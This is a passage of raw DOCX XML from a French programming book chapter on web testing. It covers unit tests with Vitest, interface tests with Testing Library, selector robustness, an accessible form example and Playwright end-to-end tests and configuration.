              <w:t>Répartition recommandée : beaucoup de tests unitaires, moins d'intégration, peu de bout en bout. Les tests lents et fragiles restent rares, mais couvrent les parcours critiques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="54" name="Picture 54"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f52.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.52 — Une répartition saine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois exécutions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Trois commandes, trois niveaux</w:t>
        <w:br/>
        <w:t>npx vitest run                     # unitaires</w:t>
        <w:br/>
        <w:t>npx vitest run --coverage          # avec couverture</w:t>
        <w:br/>
        <w:t>npx playwright test                # bout en bout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>44.2 Test unitaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un bon test unitaire est court, déterministe et vérifie un comportement. Il n'utilise ni réseau, ni horloge réelle, ni base de données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois tests utiles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formater.js</w:t>
        <w:br/>
        <w:t>export function formaterPrix(centimes, devise = "EUR") {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!Number.isInteger(centimes) || centimes &lt; 0) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw new RangeError("montant invalide");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return new Intl.NumberFormat("fr-FR", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    style: "currency", currency: devise,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }).format(centimes / 100);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// formater.test.js</w:t>
        <w:br/>
        <w:t>import { describe, it, expect } from "vitest";</w:t>
        <w:br/>
        <w:t>import { formaterPrix } from "./formater.js";</w:t>
        <w:br/>
        <w:br/>
        <w:t>describe("formaterPrix", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  it("formate un montant en euros", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    expect(formaterPrix(1234)).toBe("12,34 €");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  it("formate une devise étrangère", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    expect(formaterPrix(1234, "USD")).toContain("12,34");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  it("refuse un montant négatif", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    expect(() =&gt; formaterPrix(-1)).toThrow(RangeError);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.149 — Deux colonnes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4507"/>
        <w:gridCol w:w="4507"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Bon test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Mauvais test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérifie un comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérifie l'implémentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>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Un cas, une assertion claire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Vingt assertions enchaînées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déterministe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépend de l'heure ou du réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>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Nomme le cas testé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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 fonctionne »</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attend une seconde sans raison</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UN TEST QUI VÉRIFIE L'IMPLÉMENTATION BLOQUE LE REFACTORING</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si un test échoue à chaque changement interne sans modifier le comportement observable, il mesure la forme du code, pas son effet. Testez l'entrée et la sortie.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>44.3 Test d'interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant se teste par ce que l'utilisateur voit : un rôle, un libellé, un texte. Chercher une classe CSS rend le test dépendant du style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux tests par l'interface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import { render, screen } from "@testing-library/dom";</w:t>
        <w:br/>
        <w:t>import userEvent from "@testing-library/user-event";</w:t>
        <w:br/>
        <w:t>import { Panier } from "./panier.js";</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("ajoute un article et met à jour le total", async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  render(Panier({ articles: [{ nom: "Livre", prix: 1200 }] }));</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  await userEvent.click(screen.getByRole("button", { name: /ajouter/i }));</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  expect(screen.getByText(/1 article/i)).toBeTruthy();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(screen.getByText("12,00 €")).toBeTruthy();</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>it("signale un panier vide", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  render(Panier({ articles: [] }));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(screen.getByRole("status").textContent).toMatch(/panier vide/i);</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.150 — Cinq sélecteurs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09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Sélecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Robustesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rôle + nom accessible</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Élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Libellé de champ</w:t>
            </w:r>
          </w:p>
        </w:tc>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Élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Formulaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte visible</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Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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data-testid</w:t>
            </w:r>
          </w:p>
        </w:tc>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Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Dernier recours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Classe CSS</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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>À éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un formulaire testable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 Un composant accessible est aussi plus facile à tester --&gt;</w:t>
        <w:br/>
        <w:t>&lt;form&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;label for="courriel"&gt;Adresse électronique&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input id="courriel" name="courriel" type="email" required</w:t>
        <w:br/>
        <w:t xml:space="preserve">         aria-describedby="aide-courriel"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p id="aide-courriel"&gt;Nous ne partageons jamais votre adresse.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="submit"&gt;S'inscrire&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w: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L'ACCESSIBILITÉ REND LES TESTS PLUS SIMPLES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un bouton sans nom accessible est introuvable par rôle et libellé. Corriger l'accessibilité corrige souvent les difficultés de test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>44.4 Bout en bout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test de bout en bout traverse un vrai navigateur. Il couvre les parcours critiques : inscription, connexion, achat, paiement. Chaque parcours ajouté coûte en maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un parcours critique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parcours.spec.js</w:t>
        <w:br/>
        <w:t>import { test, expect } from "@playwright/test";</w:t>
        <w:br/>
        <w:br/>
        <w:t>test("un visiteur peut rechercher puis ouvrir une fiche", async ({ page }) =&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await page.goto("/");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await page.getByRole("searchbox", { name: /rechercher/i }).fill("livre");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await page.getByRole("button", { name: /lancer la recherche/i }).click();</w:t>
        <w:br/>
        <w:br/>
        <w:t>await expect(page.getByRole("heading", { name: /résultats/i })).toBeVisible();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await page.getByRole("link", { name: /livre de cuisine/i }).click();</w:t>
        <w:br/>
        <w:br/>
        <w:t>await expect(page.getByRole("heading", { level: 1 })).toContainText("livre de</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cuisine");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await expect(page.getByText(/en stock/i)).toBeVisible();</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une configuration prudente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playwright.config.js</w:t>
        <w:br/>
        <w:t>export default {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  use: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    baseURL: "http://localhost:4173",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    trace: "on-first-retry",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    screenshot: "only-on-failure",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  retries: process.env.CI ? 2 : 0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  reporter: [["list"], ["html", { open: "never" }]],</w:t>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.151 — Cinq symptômes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9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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test qui échoue au hasard</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Attente fixe (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sleep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attendre un état visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Test long</w:t>
            </w:r>
          </w:p>
        </w:tc>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Parcours trop large</w:t>
